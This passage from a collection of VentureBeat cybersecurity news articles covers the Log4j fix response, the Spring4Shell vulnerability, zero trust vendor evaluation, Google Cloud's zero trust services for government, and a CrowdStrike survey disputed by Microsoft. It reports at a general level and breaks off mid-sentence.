chief technology officer at Sonatype, in an email. “This particular issue is potentially more dangerous because Log4j is widely adopted. [But] the Apache Log4j team pushed out a fix with urgency. How quickly they moved greatly reduced the chance of severely negative, long-term impacts.” Proactive approach Dave Klein, director of cyber evangelism at Cymulate, said that while the severity of the situation can’t be downplayed — he expects an exploit within 48 hours — the response to the discovery of the vulnerability shows that “we’re getting better at being proactive.” VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! “In the past, you literally had zero days that were two years long,” Klein told VentureBeat. “Today, it really has changed. What we’re seeing is a better situation where the world is finding bug bounties useful, finding vulnerabilities, doing proof of concepts … I’d argue that this is a great example of [security in] 2021.” Crucially, the Apache Log4j team “worked overnight in a nearly unprecedented way to understand and turn around a fix on this quickly,” Fox said. “Oftentimes, zero day reports can take months to come to fruition from report to release. This one appears to have happened within days.” The heightened awareness around cybersecurity has also led to greater buy-in at the corporate leadership level, including in the boardroom, which makes a difference too, Klein said. “For me, cybersecurity is finally at a point where the boardroom gets it. And even if they don’t understand it completely, they’re reaching out to someone in technical leadership and saying, ‘I need to understand this better,'” he said. “What’s really happening is, the world’s waking up.” Technological factors On top of that, automation technologies for scanning open source code, such as software composition analysis (SCA), have found growing adoption in recent years. So has the use of detection and response capabilities, which could be crucial for uncovering threats in a situation like this. There does appear to be less reliance on the Log4j Java library now than in the past, as well. “There’s more heterogeneity in the Java logging space than there was for a long time,” said Arshan Dabirsiaghi, cofounder and chief scientist at Contrast Security, in an email. “For a long time, the only thing we used was Log4j. It’s not even the default library in some major frameworks anymore.” Regardless, “we’ll be seeing this vulnerability for the rest of our careers in all the nooks and crannies of our IT footprint,” Dabirsiaghi said. “But five years ago, it would have been a lot worse.” ‘Long tail’ vulnerability None of this is to minimize how bad the situation is for security teams and how much worse things could get in the event of an exploit. The threat posed by the remote code execution (RCE) vulnerability in Log4j is to potentially enable an attacker to remotely access and control devices. “Since this vulnerability is a component of dozens if not hundreds of software packages, it could be hiding anywhere in an organization’s network, especially enterprises with massive environments and systems,” said Karl Sigler, senior security research manager at Trustwave SpiderLabs, in an email. “The fact that this occurred during December just means a lot of holiday time is going to be missed for security teams that have to respond to threats trying to take advantage of this mass vulnerability,” Sigler said. “This vulnerability is going to have a really long tail, and will likely ruin weekends and vacations for many IT and information security professionals across the globe.” Given the scale of affected devices and exploitability of the bug, “it is highly likely to attract considerable attention from both cybercriminals and nation-state-associated actors,” said Chris Morgan, senior cyber threat intelligence analyst at Digital Shadows, in an email. Update and be vigilant Security firms say the vulnerability has impacted version 2.0 through version 2.14.1 of Apache Log4j. Organizations are “advised to update to version 2.15.0 and place additional vigilance on logs associated with susceptible applications,” Morgan said. One silver lining is that the configuration mitigations for the vulnerability are “straightforward” and can be easily implemented, said John Bambenek, principal threat hunter at Netenrich, in an email. Services including Apple iCloud and Steam, and apps including Minecraft, have been found to have vulnerabilities to the RCE vulnerability, according to LunaSec. Ultimately, according to Amit Yoran, CEO of Tenable, “the good news is that we know about it.” “The fact that it has come to light means we’re in a race to find and fix it before bad actors take full advantage of it,” Yoran said. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,095
2,022
"Spring Core vulnerability doesn't seem to be Log4Shell all over again | VentureBeat"
"https://venturebeat.com/2022/03/30/spring-core-vulnerability-doesnt-seem-to-be-log4shell-all-over-again"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Spring Core vulnerability doesn’t seem to be Log4Shell all over again Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. A newly disclosed remote code execution vulnerability in Spring Core, a widely used Java framework, does not appear to represent a Log4Shell-level threat. Security researchers at several organizations have now analyzed the vulnerability, which was disclosed on Tuesday. Several media reports have claimed the bug could be the “next Log4Shell” — akin to the RCE bug in Apache Log4j that was disclosed in December and impacted countless organizations. However, initial analysis suggests the newly disclosed RCE in Spring Core, dubbed “SpringShell” or “Spring4Shell” in some reports, has significant differences from Log4Shell — and most likely is not as severe. “Although some may compare SpringShell to Log4Shell, it is not similar at a deeper level,” analysts at cyber firm Flashpoint and its Risk Based Security unit said in a blog post. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! The analysts reported that they’ve verified that a published proof-of-concept for the vulnerability is “functional,” which they said validates the vulnerability. However, while the vulnerability does currently appear to be legitimate, “its impact may not be as severe as initially rumored,” Flashpoint said in a tweet. Security professional Chris Partridge, who compiled information on the vulnerability on GitHub , wrote that “this does not instinctively seem like it’s going to be a cataclysmic event such as Log4Shell.” “This vulnerability appears to require some probing to get working depending on the target environment,” Partridge said. As a result, researchers suggest that while it’s technically possible for the vulnerability to be exploited, the key question is how many real-world applications are actually impacted by it. (BleepingComputer has reported hearing from multiple sources that the vulnerability is being “actively exploited” by attackers.) The prerequisites: – Uses Spring Beans – Uses Spring Parameter Binding – Spring Parameter Binding must be configured to use a non-basic parameter type, such as POJOs All this smells of "How can I make an app that's exploitable" vs. "How can I exploit this thing that exists?" “The new vulnerability does seem to allow unauthenticated RCE — but at the same time, has mitigations and is not currently at the level of impact of Log4j,” said Brian Fox, CTO of application security firm Sonatype, in an email to VentureBeat. The Log4Shell vulnerability , on the other hand, was believed to have impacted the majority of organizations, due to the pervasiveness of the Log4j logging software. The fact that Log4j is often leveraged indirectly via Java frameworks has also made the issue difficult to fully address for many organizations. No patches yet In terms of the new Spring Core vulnerability, security engineers at Praetorian said that the vulnerability affects Spring Core on JDK (Java Development Kit) 9 and above. The RCE vulnerability stems from a bypass of CVE-2010-1622 , the Praetorian engineers said. Spring Framework is a popular framework used in the development of Java web applications. At the time of this writing, patches are not currently available. (The “SpringShell” vulnerability is not the same as the newly disclosed Spring Cloud vulnerability that is tracked at CVE-2022-22963. ) The Praetorian engineers said they have developed a working exploit for the RCE vulnerability. “We have disclosed full details of our exploit to the Spring security team, and are holding off on publishing more information until a patch is in place,” they said in a blog post. Update (March 30, 10:45 p.m. PST) : Researchers disclosed new evidence pointing to a possible impact from Spring4Shell on real-world applications — though examples of affected applications have not yet been reported. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,096
2,021
"7 keys to evaluating zero trust security frameworks | VentureBeat"
"https://venturebeat.com/2021/06/26/7-keys-to-evaluating-zero-trust-security-frameworks"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages 7 keys to evaluating zero trust security frameworks Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Zero trust as a framework for securing modern enterprises has been around for years, but is drawing renewed attention with the increase in cyberattacks. The United States government is pushing for zero trust implementations across all its agencies, and more vendors are jumping on board the already rolling zero trust product bandwagon. The mix of user need and vendor hype makes zero trust frameworks especially difficult to evaluate. Can a given zero trust solution stand up to close scrutiny? Buyers need to define and test an impartial, balanced set of complex criteria before making their purchase decisions. Factors to consider include scalability, advanced patch management, and least-privileged access, and that is just the beginning. As automated AI-based network and application discovery gains traction, buyers must be prepared to assess the effectiveness of AI software, which is no small task. Zero trust meets mega hype According to a recent ThycoticCentrify survey, 77% of organizations already use a zero trust approach in their cybersecurity strategy. For 42% of respondents, “reducing cyber threats” was the top motivator for adoption, followed by better compliance (30%), reducing privileged access abuse (14%), and inspecting and logging traffic/access requests (also 14%). VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Interest in zero trust grew more than 230% in 2020 over 2019, according to Gartner. Twenty to thirty new vendors claim to have zero trust-native products or services every quarter, with at least a dozen or more entirely new solutions announced at the RSA Conference. In fact, over 160 vendors are offering zero trust solutions today. But, as organizations ramp up their spending on zero trust, it’s important to separate hype from results. On May 12, President Biden released the Executive Order on Improving the Nation’s Cybersecurity. The Order defines zero trust as the architectural standard for the federal government, calling on the Cybersecurity and Infrastructure Security Agency (CISA) to modernize its current and future cloud computing-based cybersecurity capabilities, programs, and services to support the zero trust architecture. Adopting multi-factor authentication (MFA), employing micro-segmentation, and enforcing least privileged access are table stakes for zero trust architectures. The techniques will see greater adoption in enterprises because they’re mentioned in that Executive Order. Zero trust is not just about an architecture, and not just about a platform and technology implementation, according to Nayaki Nayyar, chief product officer and president of Ivanti’s Service Management Solutions business. “It’s really a mindset and a culture that every organization needs not only to start but accelerate given some of the recent challenges that everyone has experienced,” she said recently during a presentation on zero trust at Ivanti Solutions Summit 2021. Clearly, an in-depth framework evaluation is an essential part of the mindset users must assume as they build their cybersecurity strategies and architectures. The following seven factors help to isolate those cybersecurity vendors capable of providing a solid zero trust architecture today. Factor 1: Scalability How well a given zero trust solution can scale from protecting small and medium businesses (SMBs) to large-scale enterprises defines how well its architecture is designed to adapt and flex to an organizations’ changing needs. Track-tested zero trust solutions can just as quickly protect a remote office, regional center of offices, or an entire organization. However, securing SMBs that often act as independent partners to larger enterprises is often overlooked. Interested in learning more about how SMBs and midsize enterprises can implement a zero trust architecture, I spoke with Chase Cunningham, chief strategy officer at Ericom Software and a retired Navy cryptologist. Cunningham explained that there are significant gaps in SMB and mid-tier enterprise networked workspaces today — gaps that are difficult to close due to reliance on obsolete perimeter-based technologies. Cunningham says for any zero trust solution to scale and protect SMBs with the same level of security that enterprises achieve, security policy enforcement must occur at the edge, where users, devices, apps, and workloads interact. Scalability also means the system must be transparent to users, so that users can focus on their jobs instead of trying to figure out security. Moreover, the system must be simple to activate, set policy, scale, and modify as an organization’s needs adapt to new circumstances. On top of that, scalability requires a fully integrated, no-cost identity access management (IAM) tool that works with any authentication provider. Factor 2: A proven track record To excel at delivering a zero trust solution, a cybersecurity vendor needs to provide one or more ways to gain real-time insights and visibility across all endpoint assets, devices, and data stores. Identifying and isolating rogue devices is also essential for protecting every endpoint. Evaluating potential zero trust vendors on this attribute will quickly separate those who have active R&D programs going on today and push the limits of their machine learning, AI, and related advanced analytics functions. Another reason this is a helpful benchmark because it’s impossible to fake this functionality on a legacy cybersecurity platform or app that relies on interdomain or group-based controls. Zero trust vendors who double down on R&D spending around automating network discovery and optimizing workflows are setting a quick pace of innovation. Look for AI-based zero trust apps and platforms with customer references as a good evaluation criterion. Leaders in this area include Akamai, Forescout, Fortinet, and Ivanti. Automated network discovery workflows are an essential element of network access control platforms. The most advanced zero trust solutions in this area include user and entity behavior analytics (UEBA) anomaly detection, alert-based integration with third-party networks for OT threat detection and response, agentless profiling, and support for hosting on public cloud platforms, including Amazon AWS and Microsoft Azure. Of the many competitors in this area of the zero trust market, the Ivanti Neurons hyperautomation platform shows the potential to deliver value for IT and operations technology (OT) reporting and deterrence. Factor 3: Protection of human and machine identities Machine identities (including bots, robots, and IoT) are growing twice as fast as human identities on organizational networks, according to Forrester’s recent Webinar, How To Secure And Govern Non-Human Identities. According to a Venafi study , machine identity attacks grew 400% between 2018 and 2019, increasing by over 700% between 2014 and 2019. These studies and the rapid rise in machine-to-machine breaches over the past 18 months make securing machine identities using a least-privileged-access approach a must for any organization. Benchmarking vendors claiming to offer zero trust for machine identities need to be validated with customers currently running centralized IAM across all machines. Ideally, each customer needs to have IAM and privileged access management (PAM) operational at the machine level. Financial services, logistics, supply chain, and manufacturing companies that rely on real-time monitoring as a core part of how they operate daily need to prioritize this product feature of zero trust vendors. In financial services, machine identities and machine-to-machine interactions are growing faster than IT, and cybersecurity teams struggle to keep up. Leading zero trust security providers for machine identities, including bots, robots, and IoT, are BeyondTrust, ThycoticCentrify, CyberArk, and Ivanti. HashiCorp has proven its ability to protect DevOps cycles that are primarily machine-to-machine based. Factor 4: Simultaneous endpoint security and IT asset tracking Benchmarking zero trust vendors’ innovations — their ability to go beyond the basics of endpoint security and deliver more resilient, persistent, and self-healing endpoints — is an area to address. Venture capital, early-stage investors, and private equity investors are all paying attention to self-healing endpoints, as their sales have the potential to outgrow the broader cybersecurity market. Absolute Software’s recent announcement of its intent to acquire NetMotion is one of several transactions in process. Absolute is one of the few companies publicly disclosing their acquisition plans this year. Organizations need more automated approaches to identifying endpoints that need self-healing apps, security clients or agents, firmware, and operating systems. Every organization could use greater visibility and control across IT and OT systems. Leading zero trust vendors will have references proving they can deliver IT and OT insights. In addition, endpoint detection and response (EDR) vendors continue to prioritize integrations with as diverse a base of IAM systems, log systems, zero trust mobile platforms, and anti-phishing email systems as possible. What’s fascinating about this aspect of cybersecurity product development is how varied the approaches are for solving this challenge, as reflected in the recent VentureBeat story on addressing endpoint security hype. Evaluation in this case is far from simple. As Absolute CTO Nicko van Someren, who has designed, developed, and implemented self-healing endpoints, noted, there is a wide gap between what’s not known about zero trust on endpoint devices and what is known. His advice: “When evaluating zero trust endpoint solutions, focus on the questions that force vendors to think through where their gaps are what they’re doing to close them.” Moreover, van Someren said, anyone evaluating endpoint solutions can help drive more innovation by using a more Socratic approach — one that constantly questions what one doesn’t know. Factor 5: Enforcement of zero trust across DevOps, SDLC Zero trust vendors vary significantly on how effective they are in protecting privileged access credentials across an entire software development life cycle (SDLC). This has become more evident in the wake of the SolarWinds breach , which showed how vulnerable DevOps teams are to sophisticated, patiently executed hack attempts by bad actors. Ensuring security and DevOps are on the same development platform is itself a challenge. Closing those gaps is one of the most effective approaches to streamlining product development times and delivering a higher quality code base that meets periodic security audit requirements. Vendors claiming to support zero trust to the SDLC and CI/CD progress level need to show how their APIs can scale and adapt to rapidly changing software, configuration, and DevOps requirements. Leading zero trust vendors in this market area include Checkmarx, Qualys, Rapid7, Synopsys, and Veracode. Factor 6: Deep expertise in baseline requirements Leading zero trust vendors continue to invest R&D resources that span a broad spectrum of core authentication technologies. They range from those technologies focused entirely on alleviating passwords or streamlining authentication with greater context and intelligence. Vendors should go beyond MFA and microsegmentation, as these are the baseline requirements to compete in zero trust opportunities. Look for deep expertise in adaptive authentication and support for context and user role as verification factors in the most advanced zero trust vendors in this area. The rapid growth of virtual teams is accelerating this requirement. To secure remote workers’ identities and endpoints requires zero trust, automating as many tasks related to authentication as possible to streamline the experience. Of the many zero trust-based innovations in authentication today, Ivanti’s Zero Sign-On (ZSO), now a core part of the platform following the acquisition of MobileIron, relies on proven biometrics, including Apple’s Face ID, as a secondary authentication factor to gain access to work email, unified communications and collaboration tools, and corporate-shared databases and resources. An acid test for whether a password alternative is effective is testing to see how well it can act as a mobile threat defense to the network, device, and identity level. Among innovative approaches to authentication is the Ericom Software Automated Policy Builder that learns how a policy for zero trust needs to be applied to a user or an application or both, with no input from administrators required. Factor 7: Encryption algorithms to protect data throughout all processes Evaluating zero trust vendors on if — and how much — they can enable native OS encryption mechanisms is also a practical approach to separate vendors selling hype versus results. Just as Zoom upgraded its security to 256-bit AES with GCM (Galois/Counter Mode) in 2020, evaluating zero trust vendors on their support for this standard will help prioritize the most experienced zero trust vendors under consideration. GCM is designed for high-performance data streaming over block transfers, which scales well across virtual teams that rely primarily on web conference calling apps to communicate. GCM also can authenticate encryptions, further supporting a zero trust security architecture. The more advanced zero trust vendors will also support Transport Layer Security (TLS) 1.2 cipher suites for protecting data-in-transit across the open internet. Trust is major key Overall, the seven factors provided here are meant as a roadmap to help guide organizations in selecting zero trust vendors that can scale and support rapidly changing business initiatives. In evaluating frameworks, it is key to understand how competitive a given vendor is in the fastest-changing areas of zero trust. These include IAM and PAM to the machine identity level, as well as new machine-to-machine zero trust implementations. A track record of continual innovation in passwordless and advanced authentication technologies and the constant development of encryption algorithms are good benchmarks to apply to any zero trust vendor that an organization might look to confidently engage. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,097
2,021
"Google Cloud targets Biden's zero trust order with new services | VentureBeat"
"https://venturebeat.com/2021/07/20/google-cloud-targets-bidens-zero-trust-order-with-new-services"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Google Cloud targets Biden’s zero trust order with new services Share on Facebook Share on X Share on LinkedIn The United States Capitol Building in Washington D.C. Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. In addition to a suite of new security tools and services , Google Cloud today unveiled new offerings aimed at helping government organizations accelerate their implementation of zero trust architecture. Announced at the company’s Government Security Summit, the offerings include a planning tool, threat detection services, and a container-based solution for secure application access and monitoring. Mike Daniels, VP of global public sector for Google Cloud, kicked off a news conference about the announcements by reflecting on Google’s own journey to zero trust. “It started 10 years ago when we realized our systems were compromised by a nation-state actor,” he said. “We knew where they were, and we knew that we needed to change the way we approach security, kind of from the ground up.” Now, these new offerings come on the back of a global uptick in cyberattacks by nation-state actors and a mandate from the White House to start migrating the government to zero trust security. In May, President Biden issued an executive order and gave all government agency heads 60 days to develop a plan to implement the architecture. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Zero Trust Assessment and Planning To kick things off, Google Cloud announced a new service aimed at helping government agencies navigate step one. The Zero Trust Assessment and Planning offering consists of assessments, workshops, and strategy development, and it entails Google Cloud’s professional services organization (PSO) directly advising government organizations. “Zero trust is something that everyone wants to get to but no one knows where to begin,” Daniels said. “That ‘how’ step is incredibly important, and it’s different for each one of our government organizations based on the IP landscape they have and what are the most pressing threats.” From core applications to data, the company says the advising will be done in phases and address both core applications and data. The culture changes, policies, and technologies needed to achieve a zero trust framework are all part of the curriculum, and Google Cloud will help with the transition for existing assets and infrastructure in cloud-based, on-premises, and hybrid environments. Secure Application Access Anywhere Additionally, Google Cloud also announced Secure Application Access Anywhere, a container-based offering for secure application access and monitoring. Leveraging Google Cloud’s Anthos, it’s intended to deploy and manage containers that provide secure access and monitoring for applications in cloud or on-premises environments. The offering is being delivered in partnership with Palo Alto Networks and Google Cloud’s PSO team, and the company says it can serve as a “scalable, highly responsive alternative to government network boundary systems.” Already, Google Cloud tested Secure Application Access Anywhere with the Defense Innovation Unit (DIU), an organization within the Department of Defense. Google Cloud reports the prototype of this solution helped accelerate DIU’s zero trust journey, specifically in regards to accessing software-as-a-service (SaaS) apps directly over the internet. Daniels said the pilot started before the pandemic, but that “the timing was absolutely spot on.” “They were exploring alternatives to this CAP system with respect to access, and we completed that prototype with a success letter from the IU just recently,” he said. “So [it’s] a great offering, and I think extraordinarily timely for our government customers.” Active Cyber Threat Detection Rounding out the announcements is a new service called Active Cyber Threat Detection. Delivered through a partner, Fishtech Cyderes, Google Cloud says it can help government organizations quickly determine if they may have been compromised by cyberattacks that they have not yet detected. Steeped in threat hunting and detection, the service also leverages the capabilities of Google Cloud’s Chronicle. What’s more, both historic and current log data can be analyzed to detect threats. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,098
2,021
"CrowdStrike survey says Microsoft customers 'losing trust'; Microsoft calls report 'self-serving' | VentureBeat"
"https://venturebeat.com/2021/12/07/crowdstrike-survey-microsoft-customers-losing-trust-microsoft-calls-report-self-serving"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages CrowdStrike survey says Microsoft customers ‘losing trust’; Microsoft calls report ‘self-serving’ Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. A new survey commissioned by cybersecurity firm CrowdStrike uncovered disturbing trends when it comes to ransomware breaches, supply chain attacks, and incident detection times — while the company says the survey also found an erosion of trust in “legacy” vendors including Microsoft. In response, Microsoft provided a statement to VentureBeat characterizing the CrowdStrike report as “self-serving market research” and an attack on the company. Microsoft said it is actively “protecting both our customers and the wider industry,” including through such efforts as disrupting the activities of state-sponsored attackers. Along with inflaming the running dispute between the two competing security industry titans, the CrowdStrike-commissioned survey released today also pointed to a number of worsening issues within the cybersecurity space. According to the survey, organizations have gotten much slower at detecting cyber incidents in 2021, especially in the U.S. Meanwhile, supply chain attacks have now affected more than three-fourths of businesses, the survey found. And on ransomware, more than half of businesses said they actually don’t have a “comprehensive” strategy to defend against ransomware attacks — even as the breaches have increased and ransom payments have surged in 2021. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! A backdrop to these issues is that vulnerabilities associated with “legacy” vendors such as Microsoft are on the rise, said Michael Sentonas, CrowdStrike’s chief technology officer, in an interview with VentureBeat. “People are just getting exhausted from having to constantly run to patch. And their problem is getting worse,” Sentonas said. ‘Losing trust’? The report — the 2021 CrowdStrike Global Security Attitude Survey — was conducted in recent months by research firm Vanson Bourne, and surveyed 2,200 senior IT decision makers and IT security professionals. It’s the fourth such survey commissioned by CrowdStrike, but the first to specifically mention Microsoft — a rival firm that has ramped up its security efforts substantially in recent years. The past year has seen CrowdStrike and Microsoft increasingly battling for customers , and top CrowdStrike executives including CEO George Kurtz have brought a series of criticisms against Microsoft on security. In the new survey from CrowdStrike, one question asked respondents about their view of “legacy” vendors including Microsoft. In response, 63% of respondents said they’re “losing trust” in such vendors, according to CrowdStrike. Microsoft was the only vendor mentioned by name in the survey question. The finding “clearly demonstrates the need for a holistic approach when it comes to defending against software supply chain attacks,” the CrowdStrike report said. “Technology giants such as Microsoft are not immune to this form of cyberattack, and rather they are the gateway onto the network for millions of organizations around the globe. If they do not hold themselves accountable, then many others could suffer.” ‘Self-serving’ research? In a response to CrowdStrike’s report and Sentonas’ comments, Microsoft said in a statement to VentureBeat that “this week we announced the result of a sustained effort to proactively take down nation-state attack infrastructure, protecting both our customers and the wider industry.” The statement referred to Microsoft’s disclosure Monday that its Digital Crimes Unit had removed important infrastructure used by a hacking group based in China. “We believe this is more valuable to our customers than self-serving market research that attacks other security vendors,” Microsoft said in the statement provided to VentureBeat. Microsoft also said that its platforms and security teams prevented more than 70 billion cyber attacks during the past year, helping to protect its nearly 650,000 security customers. In a June response to previous accusations from CrowdStrike, Microsoft’s corporate vice president of communications, Frank Shaw, said on LinkedIn that the company believes security is a “team sport,” and that “fellow defenders must work together to make the world a safer place.” Supply chain and ransomware attacks In terms of supply chain security, the CrowdStrike survey found that 77% of organizations have now experienced a supply chain attack. And nearly half — 45% — had suffered a supply chain attack during the previous 12 months. In the area of ransomware, a number of findings in the survey point to worsening trends: 66% of respondents said their organization had experienced a ransomware attack in the previous 12 months, up from 56% in the 2020 report 33% of respondents acknowledged they’ve suffered multiple ransomware attacks during the past 12 months, up from 24% in the 2020 report The average ransomware payment surged by about 63% in 2021 — reaching $1.79 million, up from $1.1 million in 2020 Nearly all companies who paid a ransom — 96% — were forced to pay additional extortion fees on top of the initial ransom payment Perhaps most alarmingly, 57% of respondents said their business “did not have a comprehensive ransomware defense strategy in place,” CrowdStrike said. Slower response times Another troubling finding in the survey is that worldwide, organizations now report an average of 146 hours before a cyber incident is even detected. That’s up significantly from 2020, when the survey found an average of 117 hours for incident detection. The situation is even worse in the U.S., according to the CrowdStrike report. U.S. organizations reported an average of 165 hours before a cyber incident was detected — up from 97 hours in 2020. Sentonas said there’s no question that when it comes to cyber incident detection, “this isn’t easy.” “There are so many adversaries. There are so many attacks. The infrastructure that we use is very complex. And here we are, nearly two years into a global pandemic, and security professionals are working from home and trying to manage remote organizations. You put it all together, and it’s not easy. And I don’t want to suggest in any way that it is,” he said. “But the challenge here is that when we look at some of these statistics, they are getting worse. And U.S. organizations are worse at detection compared to the rest of the world.” Possible reasons for that may be that U.S. organizations often have larger networks than than companies globally, and may have a larger proportion of users that are continuing to work from home, according to Sentonas. Sixty-nine percent of respondents in the survey attributed a cyber incident in their organization to having staff that was working remotely. Still, the average time for detection “needs to come back the other way,” Sentonas said. “You need to be able to accelerate your detection time.” Growing vulnerabilities The survey decided to focus more on “legacy” vendors such as Microsoft this year in part because of how Microsoft has been implicated in major cyber incidents over the past year, such as the SolarWinds supply chain breach , according to Sentonas. Additionally, the number of vulnerabilities reported by Microsoft for its various platforms has seen a “staggering” increase in recent years, he said. A report from BeyondTrust found a 181% increase in Microsoft vulnerabilities between 2016 and 2020 — and a 48% increase in 2020 alone from the year before. A total of 1,268 Microsoft vulnerabilities were discovered in 2020, according to the report. CrowdStrike’s survey contends that due to this frequency of vulnerability issues, paired with high-profile incidents such as SolarWinds, there is a “crisis of trust in legacy IT vendors, such as Microsoft.” Similar phrasing had previously been used by CrowdStrike CEO Kurtz in discussing Microsoft. During CrowdStrike’s quarterly investor call in March, Kurtz said that there is a “crisis of trust within the Microsoft customer base” in the wake of the SolarWinds attack and the Microsoft Exchange zero day vulnerabilities that were revealed that same month. ‘Weaknesses’ exploited The SolarWinds incident involved malicious code inserted into the software supply chain for the company’s Orion network monitoring solution, which was then distributed to thousands of customers, including numerous federal agencies. However, a “significant” number of customers that were affected in connection with the attack weren’t actually SolarWinds customers, Sentonas noted. “What we saw was the threat actor in this particular case took advantage of weaknesses in [Microsoft’s] Windows authentication architecture. They were able to get in and then start to move laterally throughout the organization,” he told VentureBeat. “This was because of issues having to do with the authentication architecture around [Microsoft’s] Active Directory and Azure Active Directory, and the way it is configured.” Another CrowdStrike executive who has criticized Microsoft on security in the past is James Yeager, the company’s vice president of public sector, who wrote in a LinkedIn post in June that Microsoft is “incapable” of protecting even its own infrastructure. Shaw’s LinkedIn post was a response to this post from Yeager. In the post, Shaw wrote that “we fundamentally believe that security is a team sport and fellow defenders must work together to make the world a safer place.” “It’s unfortunate to see some vendors attempt to further their position via innuendo and inaccurate accusations rather than seeking ways to contribute collaboratively,” Shaw wrote in the post. “Every day Microsoft handles authentication for more than 425 million users and delivers protection with 2.5 billion detections blocking 6 billion threats annually — all while contributing massive amounts of data to the defender community. That’s the definition of a trusted and proven security leader, by any measure.” Tools and expertise Altogether, the issues of worsening attacks and response times partly relate to the security tools in use by companies — but it’s potentially even more important to focus on the “tradecraft” that adversaries are using, Sentonas said. A recent report from CrowdStrike’s Falcon OverWatch threat hunting team found that nearly 70% of the intrusions that were investigated did not use any malware at all, he noted. “So if your strategy is to go and get the best anti-malware capabilities, and 70% of the time the adversary is not using malware — well, what then?” Sentonas said. “That’s why we say, you need to have the right tools — but you also need to understand the right tradecraft.” In other words, “you need to know what to look for,” he said. “How are the adversaries actually getting on the network? What techniques are 